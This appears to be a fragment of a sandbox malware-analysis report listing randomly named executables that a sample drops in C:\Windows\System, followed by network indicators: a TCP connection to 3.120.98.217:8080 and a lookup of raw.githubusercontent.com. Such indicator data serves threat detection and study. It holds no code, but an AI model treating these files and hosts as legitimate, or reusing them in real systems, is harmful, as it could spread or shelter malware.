C:\Windows\System\xVdPwqh.exe

C:\Windows\System\xVdPwqh.exe

C:\Windows\System\EqVJfku.exe

C:\Windows\System\EqVJfku.exe

C:\Windows\System\WuHxypk.exe

C:\Windows\System\WuHxypk.exe

C:\Windows\System\ucwETNB.exe

C:\Windows\System\ucwETNB.exe

C:\Windows\System\GQugZZo.exe

C:\Windows\System\GQugZZo.exe

C:\Windows\System\SPNSAQK.exe

C:\Windows\System\SPNSAQK.exe

C:\Windows\System\JHMUyzU.exe

C:\Windows\System\JHMUyzU.exe

C:\Windows\System\fIHozvC.exe

C:\Windows\System\fIHozvC.exe

C:\Windows\System\pEKaiQk.exe

C:\Windows\System\pEKaiQk.exe

C:\Windows\System\yxYNzWZ.exe

C:\Windows\System\yxYNzWZ.exe

C:\Windows\System\XdfjGPa.exe

C:\Windows\System\XdfjGPa.exe

C:\Windows\System\gyWEyPn.exe

C:\Windows\System\gyWEyPn.exe

C:\Windows\System\cjzFDfN.exe

C:\Windows\System\cjzFDfN.exe

C:\Windows\System\YVgSGaC.exe

C:\Windows\System\YVgSGaC.exe

C:\Windows\System\YaUXgeQ.exe

C:\Windows\System\YaUXgeQ.exe

C:\Windows\System\eCFWzpu.exe

C:\Windows\System\eCFWzpu.exe

C:\Windows\System\WIhIDKn.exe

C:\Windows\System\WIhIDKn.exe

C:\Windows\System\rVlqtWy.exe

C:\Windows\System\rVlqtWy.exe

C:\Windows\System\dYdEDhN.exe

C:\Windows\System\dYdEDhN.exe

C:\Windows\System\NYqeDZx.exe

C:\Windows\System\NYqeDZx.exe

C:\Windows\System\ctnYXoS.exe

C:\Windows\System\ctnYXoS.exe

C:\Windows\System\pShUyUR.exe

C:\Windows\System\pShUyUR.exe

C:\Windows\System\DJxyHeW.exe

C:\Windows\System\DJxyHeW.exe

C:\Windows\System\UQyilLd.exe

C:\Windows\System\UQyilLd.exe

C:\Windows\System\CGHFSNc.exe

C:\Windows\System\CGHFSNc.exe

C:\Windows\System\bSHZnPV.exe

C:\Windows\System\bSHZnPV.exe

C:\Windows\System\chKLiyO.exe

C:\Windows\System\chKLiyO.exe

C:\Windows\System\HpvSOLG.exe

C:\Windows\System\HpvSOLG.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp

Files
